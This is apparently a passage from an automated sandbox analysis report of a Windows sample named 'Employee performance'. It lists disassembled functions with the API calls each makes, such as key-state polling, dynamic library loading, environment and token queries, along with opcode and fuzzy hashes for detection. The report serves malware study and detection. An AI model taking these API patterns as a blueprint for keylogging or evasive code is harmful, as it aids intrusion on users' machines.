Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: e1b22e08fb92f588f9b90397cda81371e2b35571bf3deb543f69e7e65a5b3ffb
Instruction ID: 4c57303cfe24c74984ec4fa25bc0be828649206c2646bc0da0f0b6e4ad1cf8ff
Opcode Fuzzy Hash: e1b22e08fb92f588f9b90397cda81371e2b35571bf3deb543f69e7e65a5b3ffb
Instruction Fuzzy Hash: F8516BB5A00219EFDB10DF58C884AAABBF8FF89310F05859AF945DB314E734E911CB90

Function 01048AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 01048BAE
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 01048BDA
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 01048C32
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 01048C57
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 01048C5F

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: e7b7c894a07ad7979a5ae672194ac417ec399f74d9750e706ea66d0ba1316ea7
Instruction ID: c8f0c411d548b07e0ec7e810e1bc14cd7761169dc931db02e2f078c06f97984f
Opcode Fuzzy Hash: e7b7c894a07ad7979a5ae672194ac417ec399f74d9750e706ea66d0ba1316ea7
Instruction Fuzzy Hash: 67515A75A002199FDB11DF65C880A69BBF2FF48314F08C49AE849AB362DB35ED41DB91

Function 01058EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 01058F40
GetProcAddress.KERNEL32(00000000,?), ref: 01058FD0
GetProcAddress.KERNEL32(00000000,00000000), ref: 01058FEC
GetProcAddress.KERNEL32(00000000,?), ref: 01059032
FreeLibrary.KERNEL32(00000000), ref: 01059052

Part of subcall function 00FEF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,01041043,?,75C0E610), ref: 00FEF6E6
Part of subcall function 00FEF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0102FA64,00000000,00000000,?,?,01041043,?,75C0E610,?,0102FA64), ref: 00FEF70D

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 006a6ddb9b90422f757029e19c07842499f6dc6f25e18d173252a58096663199
Instruction ID: b5de8c52d298e78950c7533813619ae4f4b036d333cd655b5a8a097a5afa9b33
Opcode Fuzzy Hash: 006a6ddb9b90422f757029e19c07842499f6dc6f25e18d173252a58096663199
Instruction Fuzzy Hash: BC515835604205DFCB51DF58C4848AEBBF1FF49314B0880AAED8A9B362D735ED85CB90

Function 01066B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 01066C33
SetWindowLongW.USER32(?,000000EC,?), ref: 01066C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 01066C73
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0104AB79,00000000,00000000), ref: 01066C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 01066CC7

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: 542a870305ee342cd1523bd96198f2c0d9a108e796d3ecb78b231cfe0fcf1a9f
Instruction ID: 297945541406eb1d9b8c0c9336b291421e96551d07a8f683797847ac26b209f9
Opcode Fuzzy Hash: 542a870305ee342cd1523bd96198f2c0d9a108e796d3ecb78b231cfe0fcf1a9f
Instruction Fuzzy Hash: DE41A135A00508AFE7248F68CD54FB97FA9EB09360F040268F995A72A8C373AD41CA40

Function 01002051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 010020C3
_free.LIBCMT ref: 010020E3

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 85049707f91f6429376645817a041f27e4cfe2a3c5c34971eb927dfa26158306
Instruction ID: 977769e55b4fcda74f8fb1f81418ef3334d7d610fd291760e32db43c311c15e4
Opcode Fuzzy Hash: 85049707f91f6429376645817a041f27e4cfe2a3c5c34971eb927dfa26158306
Instruction Fuzzy Hash: CF41E636E003009FEB22DF78C984A9DB7F5EF89314F1545A9E655EB392D731A901CB80

Function 00FE912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00FE9141
ScreenToClient.USER32(00000000,?), ref: 00FE915E
GetAsyncKeyState.USER32(00000001), ref: 00FE9183
GetAsyncKeyState.USER32(00000002), ref: 00FE919D

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: f819e60e82f22fbdcbd2487ce1b9c8e88c190bef9ef55e0b3ea1d30bbabaa4c3
Instruction ID: 4b09042db855353f80010a18128468604ddd131e02f661bdb6f4a66b662dcfb5
Opcode Fuzzy Hash: f819e60e82f22fbdcbd2487ce1b9c8e88c190bef9ef55e0b3ea1d30bbabaa4c3
Instruction Fuzzy Hash: 61416031A0861BFBDF199F69C844BEEB775FF15320F208219E469A32D0C7785990DBA1

Function 01043874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 010438CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 01043922
TranslateMessage.USER32(?), ref: 0104394B
DispatchMessageW.USER32(?), ref: 01043955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 01043966

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: 888d7f74545d857c12481113f13d346a25e8c607f50d8dbe74baaf76bebdd4e6
Instruction ID: 50026ed6e76feb0e6ac4f3c98300041d68214ca2da7c2bbd459e4d264e4f1783
Opcode Fuzzy Hash: 888d7f74545d857c12481113f13d346a25e8c607f50d8dbe74baaf76bebdd4e6
Instruction Fuzzy Hash: F331E6B4504762AFFB75CA389488BB77BE8BB05300F4455BDD5E28A0D5E3799884CB11

Function 01031901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 01031915
PostMessageW.USER32(00000001,00000201,00000001), ref: 010319C1
Sleep.KERNEL32(00000000,?,?,?), ref: 010319C9
PostMessageW.USER32(00000001,00000202,00000000), ref: 010319DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 010319E2

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 2da094b66b7529d3e17f383ed92c0cce0dc507bdf288207b791bea9a38c75be1
Instruction ID: 586d8f63ccd00c18ea3e1ae239fba4669c8d736993972d404d8771e024513a34
Opcode Fuzzy Hash: 2da094b66b7529d3e17f383ed92c0cce0dc507bdf288207b791bea9a38c75be1
Instruction Fuzzy Hash: 4D31E871900219EFDB14CFACC948ADE3BB9EF49315F004266F9A1EB2D1C7709954CB90

Function 01065706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 01065745
SendMessageW.USER32(?,00001074,?,00000001), ref: 0106579D
_wcslen.LIBCMT ref: 010657AF
_wcslen.LIBCMT ref: 010657BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 01065816

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: 8b2e3cbb47457046c2e15deadf41e0fd7f4d8315f1410ccc6db3180d40a3f2a9
Instruction ID: 48940cf8ea3dd93b027f87c82e3451cbd862fd3c1d00b1a6aa55d4d42cf55d30
Opcode Fuzzy Hash: 8b2e3cbb47457046c2e15deadf41e0fd7f4d8315f1410ccc6db3180d40a3f2a9
Instruction Fuzzy Hash: 0D21BA71A042199AEB209FA4DC84AEE7BFCFF04764F008256FAA9EB1C4D7749585CF50

Function 01050930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 01050951
GetForegroundWindow.USER32 ref: 01050968
GetDC.USER32(00000000), ref: 010509A4
GetPixel.GDI32(00000000,?,00000003), ref: 010509B0
ReleaseDC.USER32(00000000,00000003), ref: 010509E8

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 5b9bdb98241f737b3928272859d60acef390b240281799c3b8ec2b36932e469e
Instruction ID: dee5c30b4fea109f0f163cab72dab253f6c2b3da04daa90d83926fc73f31b42b
Opcode Fuzzy Hash: 5b9bdb98241f737b3928272859d60acef390b240281799c3b8ec2b36932e469e
Instruction Fuzzy Hash: 9D218E75600204AFE714EF69D984AAEBBF9FF48700F048069F88AD7365CB75AC44CB90

Function 0100CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0100CDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0100CDE9

Part of subcall function 01003820: RtlAllocateHeap.NTDLL(00000000,?,010A1444,?,00FEFDF5,?,?,00FDA976,00000010,010A1440,00FD13FC,?,00FD13C6,?,00FD1129), ref: 01003852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0100CE0F
_free.LIBCMT ref: 0100CE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0100CE31

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: e4eafbef00befe41941ab7e61824ed3746c3d95110d33219a584784d6dfa09ca
Instruction ID: 9b26ea651d6ecffda6efffc896ed09603969240d2a2bfdbedee87329864dc7d0
Opcode Fuzzy Hash: e4eafbef00befe41941ab7e61824ed3746c3d95110d33219a584784d6dfa09ca
Instruction Fuzzy Hash: 7601FC726022557F333325BA6D4CC7F7DADDEC7AA171502A9FE85C7180DE658D0182B0

Function 00FE9639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FE9693
SelectObject.GDI32(?,00000000), ref: 00FE96A2
BeginPath.GDI32(?), ref: 00FE96B9
SelectObject.GDI32(?,00000000), ref: 00FE96E2

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 6449a88d6aa7971d877341de57a42d19a0cdcce17b0e7616e51a42b6b7b3ce9a
Instruction ID: 3cb7aab17aac138e4febea51121248ff51262fbcc70ccf4de354d4f88e8d8d8e
Opcode Fuzzy Hash: 6449a88d6aa7971d877341de57a42d19a0cdcce17b0e7616e51a42b6b7b3ce9a
Instruction Fuzzy Hash: BF21D431816785EFEB318F25E9047A93BB8BB01365F500217F490A60E8D3BA5981DFA1

Function 01035711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 01035726
_memcmp.LIBVCRUNTIME ref: 01035744
_memcmp.LIBVCRUNTIME ref: 01035757
_memcmp.LIBVCRUNTIME ref: 0103576F
_memcmp.LIBVCRUNTIME ref: 01035787

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 700888df3ca88fd43caabe50e4194da40914e6160a2fa88767e2cb8247da6ae1
Instruction ID: 1f55727aa7a49a756ec05942646f03bbc37c01a22281b8f0c2b2969112db74fd
Opcode Fuzzy Hash: 700888df3ca88fd43caabe50e4194da40914e6160a2fa88767e2cb8247da6ae1
Instruction Fuzzy Hash: 5E01D86564520AFBE20A5515BE92FBF739DBFA13A4F414024FE449F212F764ED10D2E0

Function 01002DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00FFF2DE,01003863,010A1444,?,00FEFDF5,?,?,00FDA976,00000010,010A1440,00FD13FC,?,00FD13C6), ref: 01002DFD
_free.LIBCMT ref: 01002E32
_free.LIBCMT ref: 01002E59
SetLastError.KERNEL32(00000000,00FD1129), ref: 01002E66
SetLastError.KERNEL32(00000000,00FD1129), ref: 01002E6F

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: bfb9e6cbbb50e4716459df7e6c58cf7456233bd0b9067b6f044d018982f1f9c0
Instruction ID: d8c94fdba565fcfb894b054e932c0d5332863ed287822ff04d6ddb54aae6a3ee
Opcode Fuzzy Hash: bfb9e6cbbb50e4716459df7e6c58cf7456233bd0b9067b6f044d018982f1f9c0
Instruction Fuzzy Hash: 6F01F9765886416BF62376396D4CD6F159DABE13A1F650028F5D5921D5EA358C014220

Function 0103000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0102FF41,80070057,?,?,?,0103035E), ref: 0103002B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0102FF41,80070057,?,?), ref: 01030046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0102FF41,80070057,?,?), ref: 01030054
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0102FF41,80070057,?), ref: 01030064
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0102FF41,80070057,?,?), ref: 01030070

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: fadc88627824b340f4cd6f00810d7f77de3d7c9ebf5147bc3855893b1392e7e1
Instruction ID: c8157c7d94ba7ade70b9beace782c4fdbaa64553fbeb554973a277b089bada1e
Opcode Fuzzy Hash: fadc88627824b340f4cd6f00810d7f77de3d7c9ebf5147bc3855893b1392e7e1
Instruction Fuzzy Hash: 0101A272601205BFEB205F68DD44BAABEEDEF84761F144124FAC5D2218D77ADD408BA0

Function 0103E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 0103E997
QueryPerformanceFrequency.KERNEL32(?), ref: 0103E9A5
Sleep.KERNEL32(00000000), ref: 0103E9AD
QueryPerformanceCounter.KERNEL32(?), ref: 0103E9B7
Sleep.KERNEL32 ref: 0103E9F3

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 2649a1971142726daa15472736e6375d2ff14d4090702d4144bb2f58131eeea9
Instruction ID: 17059d75b81a095d235168a53b8396d8c7537929e3559de0dff8bfb5df9fce9e
Opcode Fuzzy Hash: 2649a1971142726daa15472736e6375d2ff14d4090702d4144bb2f58131eeea9
Instruction Fuzzy Hash: 4E016931C01629DBDF50AFE4D948AEDBB7CFF49301F000656E9C2B2244CB399552CBA1

Function 010310F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01031114
GetLastError.KERNEL32(?,00000000,00000000,?,?,01030B9B,?,?,?), ref: 01031120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,01030B9B,?,?,?), ref: 0103112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,01030B9B,?,?,?), ref: 01031136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0103114D

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: d59fb4f22d3370e8b558bc8f9535d97276ec335f5c0a64a661fd5fedc2426ddd
Instruction ID: 278874d13ed5a6f6a079012510b1ca99c1e505e5da88586600f2ddd894d8a244
Opcode Fuzzy Hash: d59fb4f22d3370e8b558bc8f9535d97276ec335f5c0a64a661fd5fedc2426ddd
Instruction Fuzzy Hash: ED011D75200205BFEB214F69DD49AAA3FAEEFCA260B104455F9C5D7354DA36DD009B60

Function 01030FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 01030FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 01030FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 01030FE5
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 01030FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 01031002

Memory Dump Source

